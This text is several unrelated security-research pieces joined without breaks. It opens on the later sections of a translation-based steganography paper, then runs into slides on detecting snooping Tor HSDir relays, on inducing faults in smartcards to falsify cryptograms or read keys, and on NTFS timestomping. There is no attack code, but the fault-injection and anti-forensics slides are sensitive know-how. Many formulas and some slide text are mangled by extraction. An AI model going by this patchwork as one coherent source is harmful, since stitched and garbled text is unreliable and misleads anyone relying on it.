substitutions that attempt to mimic the likely errors observed. 5.4 Results from the Prototype Different configurations of the system produce translations of varying quality, but even quality degradation is not predictable. Sometimes the generated mod- ifications actually (by coincidence) improve the quality of the translation. For example, a good translation of the original French sentence “Dans toute la r´e- gion, la vie est paralys´ee.” into English would be “In the entire region, life is paralysed.” Google’s translation is “In all the area, the life is paralysed.” wheras LinguaTec returns“In all of the region the life is crippled.”. Applying article sub- stitution here can actually improve the translation: one of the choices generated 14 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah by our implementation is “In all of the region, life is crippled.” Even aggressive settings are still somewhat meaningful: “In all an area, a life is paralysed.” The following German text is the first part of a paragraph from a review about a Moroccan film called “Windhorse” [27]: Der marokkanische Film ”Windhorse”erz¨ahlt die Geschichte zweier, unterschiedlichen Generationen angeh¨orender M¨anner, die durch Marokko reisen. Auf dem Weg suchen sie nach dem Einzigen, was ihnen wichtig ist: dem Sinn des Lebens. Our prototype system gives the following translation: The Moroccan film ”Windhorse” tells story from men belonging by two, different generations who travel through Morocco. They are looking for the only one which is important to them on the way: the sense of a life. For comparison, the source engine translations are also given: Google: The Moroccan film ”Windhorse” tells the history of two, different genera- tions of belonging men, who travel by Morocco. On the way they look for the none one, which is important to them: the sense of the life. LinguaTec: The Moroccan film ”Windhorse” tells the story of men belonging to two, different generations who travel through Morocco. They are looking for the only one which is important to them on the way: the meaning of the life. The Babelfish translation is identical to the Google translation except that “the none one” is replaced by “the only one”. LinguaTec provides some different syntactic structures and lexical choices, but looks quite similar. Clearly the addition of more engines would lead to more variety in the LiT version. Sometimes substitutions lead to quality degradation (“belonging by” vs. “belonging to”), and sometimes not (“sense of the life” vs. “sense of a life”). Sometimes the encoding makes the engine choose the better version of a section of text to modify: “They are looking for the only one” vs. “they look for the none one”. The original quality of the translations is not perfect. Furthermore, our ver- sion contains many of the same“differences”when compared to the source engines as the source engines have amongst themselves. Many of those differences are introduced by us (“story from men” vs. “story of men”) as opposed to coming directly from the source engines. While none of the texts are particularly read- able, our goal is to plausibly imitate machine-translated text, not to solve the problem of perfect translation. The example has most of prototype’s transformations enabled in order to achieve a higher bitrate. In general, this results in more degradation of the trans- lation; decreasing the number of transformations might improve the quality, but would also decrease the bitrate by offering fewer variations. More transforma- tions and source engines may make the resulting text potentially more likely to be flagged as suspicious by an adversary. For this example, we achieve a bitrate of 0.0164 uncompressed and 0.0224 compressed (9.33 bits per sentence); different hidden texts would, due to the encoding scheme used, achieve different bitrates. In general, we have found that the prototype gives us average bitrates of between 0.00265 and 0.00641 (uncompressed), and 0.00731 and 0.01671 (compressed), de- pending upon settings. Translation-Based Steganography 15 Bitrates and system configuration Figure 3 lists the different configurations and bitrates that are achieved by our prototype. The data is only intended to give a rough idea of the bitrates that can be achieved. An improved implementation using more rules or more translation engines can likely achieve higher bitrates. Also, it is impossible for us to give a precise metric for the quality of the generated translations. Still, the Figure can be used to give an impression for the bitrates that can be achieved with translation-based steganography. In order to allow for a fair comparison with other steganographic systems that use binary data, such as images, the bitrate is given for both uncompressed and compressed text. error- Quality- bitrate Id Languages Engines SS-W passes Limit ASCII-text compressed 1 DE-EN 1,2 ∞ - 0.50 0.00226 0.00621 2 DE-EN 1,2 4 - 0.05 0.00266 0.00731 3 DE-EN 1,2 2 - 0.05 0.00178 0.00492 4 DE-EN 1,2 1 - 0.05 0.00281 0.00776 5 DE-EN 1,2 0 - 0.05 0.00488 0.01306 6 DE-EN 1,2 ∞ (1) 0.05 0.00593 0.01585 7 DE-EN 1,2 ∞ (2) 0.05 0.00247 0.00687 8 DE-EN 1,2 2 (2) 0.05 0.00283 0.00779 9 DE-EN 1,2 1 (1)(2) 0.00 0.00632 0.01671 10 DE-EN 1,2 0 (1)(2) 0.00 0.00721 0.01907 11 FR-EN 1,2 ∞ - 0.50 0.00246 0.00670 12 FR-EN 1,2 4 - 0.05 0.00496 0.01344 13 FR-EN 1,2 2 - 0.05 0.00535 0.01429 14 FR-EN 1,2 1 - 0.05 0.00695 0.01834 15 FR-EN 1,2 0 - 0.05 0.00696 0.01834 16 FR-EN 1,2 ∞ (1) 0.05 0.00551 0.01486 17 FR-EN 1,2 ∞ (2) 0.05 0.00264 0.00721 18 FR-EN 1,2 2 (2) 0.05 0.00521 0.01401 19 FR-EN 1,2 1 (1)(2) 0.00 0.00818 0.02158 Fig. 3. Bitrates for the different configurations. Engine 1 is Google [16], Engine 2 is Linguatec [19]. SS-W lists the threshold for the number of witnesses in semantic substitution (∞ for no semantic substitutions). The error-passes are (1) articles and (2) prepositions. The quality limit is the lower limit for the relative estimated translation quality (see Section 6.3). The BR columns give the bitrate for plaintext and compressed text, counting only the size of the generated translation (excluding the text in the source language). In order to give an idea of the generated translations for the different settings (see Figure 3) we give translations for a German sentence (translated to English) and a French sentence (also translated to English). The original German sen- tences were“Gleich in den ersten Tagen nach der Katastrophe wies Unicef darauf 16 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah hin, dass die Kinder unter den Opfern des Seebebens am schwersten betroffen sind. Wir sind heute in einem Maß von einer funktionierenden Infrastruktur ab- h¨angig, wie es nie zuvor der Fall war.”, which in English would be “Already in the first days after the disaster, Unicef pointed out that children were hit worst among the victims of the seaquake. Today, the extent of our dependency on a working infrastructure is larger than ever.”. Google [16] translates this sentence as follows: “Directly in the first days after the disaster Unicef pointed out that the children among the victims of the sea-quake are most heavily concerned. We depend today in a measure on a functioning infrastructure, as it was the case never before.”. The Linguatec engine returns “Is Unicef pointed out after the catastrophe within the first days that the children are affected most heavily under the victims of the seaquake. We are dependent in a measure of an operating infrastructure today how it the case never was before.” If we add errors with the article substitution (1), we could translations such as “Directly in the first days after the disaster Unicef pointed out that the children among the victims of an sea-quake are most heavily concerned. We depend today in a measure on a functioning infrastructure, as it was an case never before.” For prepositions, a possible result is “Directly in the first days behind the disaster Unicef pointed out that the children among the victims of the sea-quake are most heavily concerned. We depend today in a measure above a functioning infrastructure, as it was the case never before.” 6 Discussion This section discusses various attacks on the steganographic encoding and pos- sible defences against these attacks. The discussion is informal, as the system is based on MT imperfections that are hard to analyze formally (which is one of the reasons why MT is such a hard topic). 6.1 Future Machine Translation Systems A possible problem that the presented steganographic encoding might face in the future is significant progress in machine translation. If machine translation were to become substantially more accurate, the possible margin of plausible mistakes might get smaller. However, one large category of machine translation errors today results from the lack of context that the machine translator takes into consideration. In order to significantly improve existing machine translation systems one necessary feature would therefore be the preservation of context information from one sentence to the next. Only with that information will it be possible to eliminate certain errors. But introducing this context into the machine transla- tion system also brings new opportunities for hiding messages in translations. Once machine translation software starts to keep context, it would be possible for the two parties that use the steganographic protocol to use this context as a Translation-Based Steganography 17 secret key. By seeding their respective translation engines with k-bits of context they can make deviations in the translations plausible, forcing the adversary to potentially try 2k possible contextual inputs in order to even establish the pos- sibility that the mechanism was used. This is similar to the idea of splitting the corpus based on a secret key, with the difference that the overall quality of the per-sentence translations would not be affected. 6.2 Repeated Sentence Problem A general problem with any approach to hiding messages in the translation is that if the text in the source language contains the same sentence twice it might be translated into two different sentences depending on the value of the bit that was hidden. Since machine translation systems (that do not keep context) would always produce the same sentence this would allow an attacker to suspect the use of steganography. The solution to this problem is to not use repeated sentences in the source text to hide data, and always output the translation that was used for the first occurence of the sentence. This attack is similar to an attack in image steganography. If an image is dig- itally altered, variations in the colors in certain implausible areas of the picture might reveal the existence of a hidden message. Solving the problem is easier for text steganography since it is easier to detect that two sentences are identical than to detect that a series of pixels in an image belong to the same digitally constructed shape and thus must have the same color. 6.3 Statistical Attacks Statistical attacks have been extremely successful at defeating steganography of images, audio and video (see, e.g., [13,20,25]). An adversary may have a sta- tistical model (e.g. a language model) that translations from all available MT systems obey. For example, Zipf’s law [21] states that the frequency of a word is inversely proportional to its rank in the sorted-by-frequency list of all words. Zipf’s law holds for English, and in fact holds even within individual categories such as nouns, verbs, adjectives, etc. Assuming that all plausible translation engines generally obey such a sta- tistical model, the steganographic encoder must be careful not to cause telltale deviations from such distributions. Naturally, this is an arms race. Once such a statistical law is known, it is actually easy to modify the steganographic encoder to eliminate translations that deviate significantly from the required distribu- tions. For example, Golle and Farahat [15] point out (in the different context of encryption) that it is possible to extensively modify a natural language text without straying noticeably from Zipf’s law. In other words, this is a very man- ageable difficulty, as long as the steganographic system is made “Zipf-aware”. We cannot preclude the existence of yet-undiscovered language models for translations that might be violated by our existing implementation. However, we expect that discovering and validating such a model is a non-trivial task for the adversary. On the other hand, given such a model (as we pointed out 18 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah above) it is easy to modify the steganographic system so as to eliminate devi- ations by avoiding sentences that would be flagged. Section 7 sketches various statistical models for attacks that might be useful against the existing prototype implementation. 6.4 Use for Watermarking The technique of this paper can be used for watermarking, in a manner that does not require the original text (or any reference translation) for reading the mark. The idea for not requiring the original in order to recover the message, which was mentioned in Section 3.3, is now sketched in more detail. We begin with a fragile version of the scheme. Let the bits of the mark be de- noted by b1, . . . , bn. Let k ∈ N be a parameter that will be determined later. The technique consists of using a (secret) random seed s as key for determining those places where the n bits of the mark will be embedded. Let the random sequence generated by the seed consist of numbers r1, . . . , rk·n and let the corresponding places in the text where the bits of the mark will be embedded be p1, . . . , pk·n (with pi denoting the spot for the i-th bit). Of course pi is determined by ri. The pi’s are partitioned into groups of size k each. Let the resulting groups be C1, . . . , Cn (C1 consists of p1, . . . , pk). In what follows Pj will denote the concatenation of the contents of the k positions pi that are in group Cj (so Pj changes as the algorithm modifies those k positions – e.g., when the algorithm replaces “cat” by “feline” that replacement is reflected within Pj). Each Cj is associated with sj which is defined to be the least significant bit of Hs(Pj) where Hs is a keyed cryptographic one-way hash function having s as key (recall that s is the secret seed that determined the ri). As a result, sj changes with 50% probability as Pj is modified. In order to embed bj in Cj the algorithm“tortures Cj until it confesses”: Cj is modified until its sj equals bj. Every one of the k possible changes made within Cj has a 50% change of producing an sj that equals the target bj, and the probability that we fail e times is 2−e. A large choice for k will give the algorithm more room for modifications and thus ensure that the embedding will fail with reasonably low probability. It is possible to choose a small k and use an error-correcting code in order to correct bits that could not be embedded properly. The advantage of the scheme is that the receiver can receive all of the sj from the seed s without needing the original text or any reference baseline translation of it: the received message and the seed are all that is required to retrieve the mark. More robust versions of the scheme can be obtained by using the techniques described in [4], which include the use of markers (a marker is a sentence that merely indicates that the group of contiguous sentences that immediately follow it are watermark-carrying, so the marker is not itself watermark-carrying). One of the ways of determining markers is by a secret (because keyed) ordering of the sentences, the markers being the sentences that are lowest in that secret ordering – see [4] for details, and for an analysis that quantifies the scheme’s resilience against different kinds of attacks. Translation-Based Steganography 19 6.5 Other applications While we have explored the possibility of using the inherent noise of natural language translation to hide data, we suspect that there may be other areas where transformation spaces exist which exhibit a similar lack of rigidity. For example, compilers doing source translation have a variety of possible output possibilities that still preserve semantics. Finding a way to hide information with these possibilities while still mimicking the properties of various optimization and transformation styles is a possibility for future work. 7 Statistical Attack Vectors Statistical attacks fall into two categories. The first attacks the translation. The translation models look at both the source and the target text. The second category, language models, only look at the generated translations and try to find inconsistencies within that text, without reference to the original text. 7.1 Translation Models Word Count The average word count may yield a different ratio between the source and target languages when steganography is in use. The rationale is that the steganographic engine will discard words more readily than inserting them (though, insertion of more words can occur in the current engine through preposition substitution). An unmodified translation would then yield a higher ratio of average number of words in the source language to the average number of words in the target language compared to a text that had information hidden in it. Engine Errors Certain engines are given to certain types of errors. If a text is translated by an engine and has no information hidden in it it should make the errors characteristic to that engine 100% of the time. Taking the ratio of the number of errors characteristic to one engine over the number of errors characteristic to another should always yield a 0 or 1 (tolerance can be allowed in case the user hand corrected some errors). If the ratio yields something outside of that tolerance it can be seen that there are a mixture of error types, and therefore a mixture of engines being used. Automatic classification of engine- specific errors is likely to be rather difficult. Also, if the translation engines used by the encoder are unknown to the attacker this attack cannot be used. 7.2 Language Model Character Count The idea here is quite similar to the previous model. An untouched translation will yield a lower ratio of average number of characters in the source language to the average number in the target language. The rationale here is when substitution occurs the substituted word is more likely to be more complex and longer than the original translation. 20 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah Nouns Without Articles Since the current steganographic engine discards articles for nouns on occasion and never inserts new ones (since it does not have enough semantic knowledge to detect nouns) the total percentage of nouns without articles should be higher for a text containing hidden information. Witness Count When a semantic substitution is made by our system the word that is chosen for replacement is likely to be more specific or complex than the word that it is replacing. With that in mind the number of witnesses for the word selected to hide information should ordinarily be lower than the word that it is replacing. A normal translation should thus yield a higher ratio between semantic substitution witnesses from the target to the source language than a translation that contains a hidden message. 8 Conclusion This paper introduced a new steganographic encoding scheme based on hid- ing messages in the noise that is inherent to natural language translation. The steganographic message is hidden in the translation by selecting between multi- ple translations which are generated by either modifying the translation process or by post-processing the translated sentences. In order to defeat the system, an adversary has to demonstrate that the resulting translation is unlikely to have been generated by any automatic machine translation system. A study of common mistakes in machine translation was used to come up with plausible modifications that could be made to the translations. It was demonstrated that the variations produced by the steganographic encoding are similar to those of various unmodified machine translation systems, demonstrating that it would be impractical for an adversary to establish the existence of a hidden message. The highest bitrate that our prototype could achieve with this new steganographic encoding is about 0.01671. Acknowledgements Portions of this work were supported by Grants IIS-0325345, IIS-0219560, IIS- 0312357, and IIS-0242421 from the National Science Foundation, Contract N00014- 02-1-0364 from the Office of Naval Research, by sponsors of the Center for Ed- ucation and Research in Information Assurance and Security, and by Purdue Discovery Park’s e-enterprise Center. References 1. R. Agrawal, P. Haas, and J. Kiernan. Watermarking relational data: Framework, algorithms and analysis. The VLDB Journal, 12(2):157–169, 2003. 2. Y. Al-Onaizan, J. Curin, M. Jahr, K. Knight, J. Lafferty, I. D. Melamed, F. J. Och, D. Purdy, N. A. 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Freier und Sklave, Patrizier und Plebejer, Baron und Leibeigener, Zunft- b¨urger und Gesell, kurz, Unterdr¨ucker und Unterdr¨uckte standen in stetem Gegensatz zueinander, f¨uhrten einen ununterbrochenen, bald versteckten, bald offenen Kampf, einen Kampf, der jedesmal mit einer revolution¨aren Umgestal- tung der ganzen Gesellschaft endete oder mit dem gemeinsamen Untergang der k¨ampfenden Klassen. In den fr¨uheren Epochen der Geschichte finden wir fast ¨uberall eine voll- st¨andige Gliederung der Gesellschaft in verschiedene St¨ande, eine mannigfaltige Abstufung der gesellschaftlichen Stellungen. Im alten Rom haben wir Patrizier, Ritter, Plebejer, Sklaven; im Mittelalter Feudalherren, Vasallen, Zunftb¨urger, Gesellen, Leibeigene, und noch dazu in fast jeder dieser Klassen besondere Ab- stufungen. Translation-Based Steganography 23 Die aus dem Untergang der feudalen Gesellschaft hervorgegangene moderne b¨urgerliche Gesellschaft hat die Klassengegens¨atze nicht aufgehoben. Sie hat nur neue Klassen, neue Bedingungen der Unterdr¨uckung, neue Gestaltungen des Kampfes an die Stelle der alten gesetzt. Unsere Epoche, die Epoche der Bourgeoisie, zeichnet sich jedoch dadurch aus, daß sie die Klassengegens¨atze vereinfacht hat. Die ganze Gesellschaft spaltet sich mehr und mehr in zwei große feindliche Lager, in zwei große, einander direkt gegen¨uberstehende Klassen: Bourgeoisie und Proletariat. Aus den Leibeigenen des Mittelalters gingen die Pfahlb¨urger der ersten St¨adte hervor; aus dieser Pfahlb¨urgerschaft entwickelten sich die ersten Elemente der Bourgeoisie. Die Entdeckung Amerikas, die Umschiffung Afrikas schufen der aufkommenden Bourgeoisie ein neues Terrain. Der ostindische und chinesische Markt, die Kolonisierung von Amerika, der Austausch mit den Kolonien, die Vermehrung der Tauschmit- tel und der Waren ¨uberhaupt gaben dem Handel, der Schiffahrt, der Industrie einen nie gekannten Aufschwung und damit dem revolution¨aren Element in der zerfallenden feudalen Gesellschaft eine rasche Entwicklung. Die bisherige feudale oder z¨unftige Betriebsweise der Industrie reichte nicht mehr aus f¨ur den mit neuen M¨arkten anwachsenden Bedarf. Die Manufaktur trat an ihre Stelle. Die Zunftmeister wurden verdr¨angt durch den industriellen Mittelstand; die Teilung der Arbeit zwischen den verschiedenen Korporationen verschwand vor der Teilung der Arbeit in der einzelnen Werkstatt selbst. Aber immer wuchsen die M¨arkte, immer stieg der Bedarf. Auch die Manufak- tur reichte nicht mehr aus. Da revolutionierte der Dampf und die Maschinerie die industrielle Produktion. An die Stelle der Manufaktur trat die moderne große Industrie, an die Stelle des industriellen Mittelstandes traten die industriellen Million¨are, die Chefs ganzer industrieller Armeen, die modernen Bourgeois. Die große Industrie hat den Weltmarkt hergestellt, den die Entdeckung Amerikas vorbereitete. Der Weltmarkt hat dem Handel, der Schiffahrt, den Landkommu- nikationen eine unermeßliche Entwicklung gegeben. Diese hat wieder auf die Ausdehnung der Industrie zur¨uckgewirkt, und in demselben Maße, worin In- dustrie, Handel, Schiffahrt, Eisenbahnen sich ausdehnten, in demselben Maße entwickelte sich die Bourgeoisie, vermehrte sie ihre Kapitalien, dr¨angte sie alle vom Mittelalter her ¨uberlieferten Klassen in den Hintergrund. Wir sehen also, wie die moderne Bourgeoisie selbst das Produkt eines langen Entwicklungsganges, einer Reihe von Umw¨alzungen in der Produktions- und Verkehrsweise ist. Jede dieser Entwicklungsstufen der Bourgeoisie war begleitet von einem entsprechen- den politischen Fortschritt . Unterdr¨uckter Stand unter der Herrschaft der Feu- dalherren, bewaffnete und sich selbst verwaltende Assoziation in der Kommune (3), hier unabh¨angige st¨adtische Republik , dort dritter steuerpflichtiger Stand der Monarchie , dann zur Zeit der Manufaktur Gegengewicht gegen den Adel in der st¨andischen oder in der absoluten Monarchie , Hauptgrundlage der großen Monarchien ¨uberhaupt, erk¨ampfte sie sich endlich seit der Herstellung der großen Industrie und des Weltmarktes im modernen Repr¨asentativstaat die ausschließliche 24 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah politische Herrschaft. Die moderne Staatsgewalt ist nur ein Ausschuß, der die gemeinschaftlichen Gesch¨afte der ganzen Bourgeoisklasse verwaltet. A.2 Output Text The history of all past society is the history of class warfares. Suitor and slave, Patrizier and Plebejer, Baron and body-own, Zunftbuerger and join, Briefly, Eliminator and suppressed stood in constant contrast to each other, Led a continuous, Soon hid, Soon open fight, A fight, a revolutionary transformation to the whole society each time ended or the common fall of the fighting classes. In the earlier epochs of history we find nearly everywhere a complete arrange- ment of the society into different conditions, A diverse gradation of the social positions. In old Rome we have Patrizier, Knight, Plebejer, Slaves; In the Middle Ages feudal sirs, Vasallen, Zunftbuerger, Skilled workers, Body-own, And still to it in nearly of these classes special gradations. The modern civil society come out from the fall of the feudalen society did not waive the class contrasts. It has only new classes, New conditions of the oppression, New organizations of the fight to the place of the old set. Our epoch, The epoch of the bourgeoisie, Stands out, however, due to it, That it simplified the class contrasts. The whole society splits in two large hostile camps more and more, Into two great ones, Each other directly facing classes: Bourgeoisie and proletariat. From the body-own of the Middle Ages the stake citizens of the first cities followed; From stake citizenry the first elements of the Bourgeoisie developed. The discovery America, A new land created the sailing around of Africa for the paying bourgeoisie. The East Indian and Chinese market, Colonizing of America, The exchange with the colonies, The increase of the mediums of exchange and the goods gave the trade at all, Shipping, The industry an up- swing and thus, never known, the revolutionary element in the feudalen society disintegrating a rapid development. The past feudale or zuenftige mode of operation of the industry was not enough any longer out for the need increasing with new markets. The manu- factory took its job. The guild masters were replaced by the industrial middle classes; The division of the work between the different Korporationen disap- peared before the division of the work in the individual workshop. But the markets always grew, The need always rose. Also the manufaktur was not sufficient. The steam and the machinery revolutionized the industrial production there. The modern large industry took the place of the manufactory, To the place of the industriellen of middle class the industriellen millionaires stepped, The bosses of whole industrieller armies, The modern Bourgeois. The large industry manufactured the world market, The discovery of Amer- ica prepared this one. The world market has the trade, Shipping, An immense development given to the country communications. This has reacted again upon the extension of the industry, And in the same measure, Into what industry, Trade, Shipping, Railways expanded, In the same himself developed mass for Translation-Based Steganography 25 the bourgeoisie, Increased it its capitals, She pressed all classes handed down here of the Middle Ages to the background. So we see, Like the modern Bourgeoisie themselves the product of a long development course, A set of circulations in production and traffic way is. Each of these entwicklungsstufen of the Bourgeoisie was accompanied of appropriate political progress.
Honey Onions: Exposing Snooping Tor HSDir Relays Guevara'Noubir &'Amirali Sanatinia {noubir,'amirali}@ccs.neu.edu Northeastern'University 1 Motivations • Previous'research'studied'the'maliciousness'of'the'relays • Known'bad'Exit'nodes • Other'work'looked'at'the'nature'of'hidden'services'content • No'prior'work'on'the'Hidden'Service'Directories'(HSDirs) • Indexing'hidden'services'requires'modification'to'Tor,'which'can'be'an' indicator'of'some'effort'and'potentially'more'malicious'activities 2 Tor & Hidden Services • A'widely'used'practical'anonymity'infrastructure • Provides'anonymity'for'both'the'clients'and'the'server'through' hidden'services • Depends'on'the'honest'behavior'of'the'volunteering'relays • It'is'known'that'some'relays'are'misbehaving'(Bad'Exit'nodes) • Some'Exit'nodes'actively'try'to'perform'Man'in'the'Middle'Attack' (MITM) • Not'much'is'known'about'the'HSDirs or'Hidden'Services'in'general 3 Hidden Service Directories (HSDir) Client Hidden Service IP RP HSDir (1) (2) (3) (4) (5) (6) (7) 4 Ring of Responsible HSDirs 5 Honey Onions (HOnions) • Each'HOnion corresponds'to'a'server/process • Run'on'local'IP'address'(Hidden'Service) • Accessible'only'through'Tor'and'not'shared'anywhere • Three'schedules • Daily • Weekly • Monthly • Log'the'requests'for'further'investigation 6 HOnions Architecture 1. Generate honions ho i ho j 2. Place honions on HSDirs 3. Build bipartite graph On visit, mark potential HSDirs ho j di di+2 di+1 di di+1 di+2 On visit, add to bipartite graph 7 Set Cover Problem • !"# = %&': )*+%+,-./0%123ℎ%!"#2+%5-.6% • !7 = ℎ*8: !792*9%3ℎ.3%1.0%:2023,& • ; = !"# ∪ !7 • = = ℎ*8,&8 %∈ !7%×%!"#% %ℎ*8%1.0%A-.Bed%on%&'%and%was%visited} • % %":%∀% ℎ*8,&' ∈ =, ∃&′' ∈ "% ∧ ℎ*8,&′' ∈ = R%⊆TRU VWXY'Z • The'set'cover'is'an'NP-complete'problem • Can'be'calculated'using'approximation'algorithms • Set'cover'gives'the'lower'bound'on'the'number'of'snooping'HSDirs 8 Heuristic Approach • Input:'''''G(V,%E): Bipartitie graph'of'HOnions to'HSDirs • Output:''S:'Set'explaining'visits • " ⟵ %∅ • while,,,;% ∩ !7% ≠ ∅%%%_o • Pick'&% ∈ ;% ∩ %!"#: 123ℎ%ℎ26ℎ,03 degree • ;% ← %;%\% &%.9&%230%!792*9%9,26ℎb*+0 • end 9 Integer Linear Programming (ILP) • min %(ef, … , eTRU)''''''''''''''''∑ e8 |TRU| 8jf subject'to%∀%ℎ*' ∈ !7 ∑ e8 ≥ 1 m ∀%8: nop,qr ∈s • Provides'a'lower'bound'on'the'number'of'snooping'HSDirs to'explain' the'visits 10 Connectivity Graph 11 Snooping Behavior • Wide'variety'of'behavior • Automated'vs'manual'probing • Aggressive,'periodic'probing • Attempts'to'find'vulnerabilities • SQL'Injection • XSS • Path'traversal • PHP'Easter'Eggs • Targeting'Drupal'and'Ruby'on'Rails 12 Snoopers’ Most Likely Geolocation 13 Snoopers’ Identity • Hard'to'identify'the'real'entity'behind'the'relays • More'than'half'of'the'HSDirs are'hosted'on'cloud'platform • The'geolocations'correspond'to'the'location'of'the'hosting'platform' and'not'necessarily'the'entity'running'them • Number'of'cloud'platforms'are'located'in'countries'with'stronger' privacy'protection'for'costumers • Some'cloud'platform'accept'payments'over'bitcoin,'making'it'even' harder'to'identify'the'real'actors 14 Conclusion • Honey'Onions'(HOnions)'is'a'framework'to'detect'snooping'HSDirs • Provides'a'lower'bound'on'such'relays • Tor'relies'on'the'honest'behavior'of'the'volunteering'relays • The'detection,'identification'and'mitigation'of'misbehaving'relays' helps'to'improve'the'privacy'and'security'of'Tor • This'work'is'an'addition'to'the'previous'body'of'work'focusing'on' detection'of'misbehaving'Tor'relays 15
August 8, 2008 Inducing Momentary Faults Within Secure Smartcards / Microcontrollers DEFCON – Las Vegas Christopher Tarnovsky Flylogic Engineering, LLC. chris@flylogic.net – http://www.flylogic.net August 8, 2008 What is a momentary fault? • Temporary forced change in behavior • The change is precisely calculated • A fault typically lasts no more than a few clock cycles • Many faults may be executed to force favorable behavior other than normal August 8, 2008 How do we do this? • Low-capacitance buffered driver • Driver is capable of driving a ‘1’ or ‘0’ • Driver is capable of listening in “Hi-Z” • Low-voltage tolerant is a plus August 8, 2008 Why would we do this? • A series of changes can allow us too: • Overwrite stack-pointer • Force repeated loops in a code segment • Falsify cryptograms August 8, 2008 Inducing the fault • Physical connection to substrate • Use low-capacitance buffered driver • Tri-stated buffer is desired- • Allow eavesdropping • Overdrive at calculated point(s) in time August 8, 2008 Eavesdropping (listening) YELLOW: Databus signal GREEN: Clock PURPLE: Reset BLUE: Trigger August 8, 2008 Overdriving last slides databus with a logic ‘0’ YELLOW: Databus signal GREEN: Clock PURPLE: Reset BLUE: Trigger August 8, 2008 Initial steps • Behavior analysis • Understand your objective (the goal) • Determine possible areas of attack • Areas such as: • Address bus • Data bus • Cryptographic blocks August 8, 2008 Address bus faults • Likely choice for cryptographic memories • Unlikely choice for microcontroller type devices • Allows complete change of data bus August 8, 2008 Data bus faults • Most probable choice of attack • Allows behavioral changes to many areas August 8, 2008 Cryptographic block faults • Limited use typically to Cryptographic Memory type devices • Can allow readout of write only keys August 8, 2008 Execution steps • Determine- • When to induce the fault • How long to induce the fault • Do we need more than one fault • Can we execute more faults on the same line • Execute the change of state during the period of time and see if the desired result occurs. • If not, possibly take a “running log” of the bus August 8, 2008 In Conclusion • Most documentation seen tends to exaggerate the security level physically implemented • Encrypted buses are just as vulnerable as non-encrypted buses • Randomizing internal clock just means add a second needle • Random software delays are unreliable • Technology is improving but is not perfect • Every standard secure IC made to date has been successfully compromised by hackers • What is made by human can be taken apart by human
Time ^ estomping time For our guests from England, please allow me to translate. ^ ng tompin timest Quick background File Creation Date Last Accessed File 127 08/04/11 10:22:36 08/04/11 10:22:3 File 128 08/04/11 10:22:37 08/04/11 10:22:3 File 129 08/04/11 10:22:37 08/04/11 10:22:3 File 130 08/04/11 10:22:37 08/04/11 10:22:3 File 131 08/04/11 10:22:38 08/04/11 10:44:1 Timestamps are important in forensic analysis. File 131 08/04/11 10:22:38 08/04/11 10:44:1 File 132 08/04/11 10:22:41 08/04/11 10:22:4 File 133 08/04/11 10:22:42 08/04/11 10:22:4 Timeline analysis is part of event reconstruction. File 134 08/04/11 10:22:43 08/04/11 10:22:4 File 135 08/04/11 10:22:43 08/04/11 10:54:0 File 136 08/04/11 10:22:43 08/04/11 10:22:4 Note: Timestamps and events are  analyzed in context, not isolation. File 137 08/04/11 10:22:45 08/04/11 10:22:4 File 138 08/04/11 10:22:46 09/06/06 08:00:0 Fil 139 08/04/11 10 22 47 08/04/11 10 22 4 File 139 08/04/11 10:22:47 08/04/11 10:22:4 File 140 08/04/11 10:22:47 08/04/11 10:22:4 File 141 08/04/11 10:22:47 08/04/11 10:39:5 File 142 08/04/11 10:22:48 08/04/11 10:22:4 File 143 08/04/11 10:22:54 08/04/11 10:22:5 File 144 08/04/11 10:22:58 08/04/11 10:22:5 To hide activities, the computer’s clock could be changed. That poses a separate set of problems and leaves its own trail of evidence. Anti‐forensic demonstration of timestomp.exe at BlackHat 2005 AttributeMagic has since joined the scene. The tools modify timestamps  (Created, Accessed, Modified, MFT Entry) to fool an unsuspecting user. But here’s the rub: The tools don’t modify all timestamps and they don’t look for all artifacts. There are eight timestamps, not four, associated with a file on NTFS file systems. All eight timestamps are in $MFT All eight timestamps are in $MFT. $STANDARD_INFORMATION Type: 0x10 $FILE_NAME Type: 0x30 Type: 0x10 Min Size: 0x30 Max Size: 0x48 Type: 0x30 Min Size: 0x44 Max Size: 0x242 Read offset to attribute content  and add: • Created (0x00) • Last Modified (0x08) Read offset to attribute content  and add: • Created (0x08) • Last Modified (0x10) Last Modified (0x08) • MFT Entry Modified (0x10) • Last Accessed (0x18) Last Modified (0x10) • MFT Entry Modified (0x18) • Last Accessed (0x20) All eight timestamps are in $MFT All eight timestamps are in $MFT. $STANDARD_INFORMATION Type: 0x10 $FILE_NAME Type: 0x30 Type: 0x10 Min Size: 0x30 Max Size: 0x48 Type: 0x30 Min Size: 0x44 Max Size: 0x242 Read offset to attribute content  and add: • Created (0x00) • Last Modified (0x08) Read offset to attribute content  and add: • Created (0x08) • Last Modified (0x10) Last Modified (0x08) • MFT Entry Modified (0x10) • Last Accessed (0x18) Last Modified (0x10) • MFT Entry Modified (0x18) • Last Accessed (0x20) These are modified by the timestomp and AttributeMagic. These are read by tools such as EnCase and FTK.  All eight timestamps are in $MFT All eight timestamps are in $MFT. $STANDARD_INFORMATION Type: 0x10 $FILE_NAME Type: 0x30 Type: 0x10 Min Size: 0x30 Max Size: 0x48 Type: 0x30 Min Size: 0x44 Max Size: 0x242 Read offset to attribute content  and add: • Created (0x00) • Last Modified (0x08) Read offset to attribute content  and add: • Created (0x08) • Last Modified (0x10) Last Modified (0x08) • MFT Entry Modified (0x10) • Last Accessed (0x18) Last Modified (0x10) • MFT Entry Modified (0x18) • Last Accessed (0x20) These can be analyzed,  but it takes more work.  Many analysts would need a reason  to start doing this extra work. All eight timestamps are in $MFT All eight timestamps are in $MFT. $STANDARD_INFORMATION Type: 0x10 $FILE_NAME Type: 0x30 Type: 0x10 Min Size: 0x30 Max Size: 0x48 Type: 0x30 Min Size: 0x44 Max Size: 0x242 Read offset to attribute content  and add: • Created (0x00) • Last Modified (0x08) Read offset to attribute content  and add: • Created (0x08) • Last Modified (0x10) Last Modified (0x08) • MFT Entry Modified (0x10) • Last Accessed (0x18) Last Modified (0x10) • MFT Entry Modified (0x18) • Last Accessed (0x20) The values in each attribute can be compared, but it takes work. 4 timestamps 4 timestamps So what would give an examiner a reason to start digging? Obvious timestomping Obvious timestomping. All entries are blank. Example Inconsistent timestamps 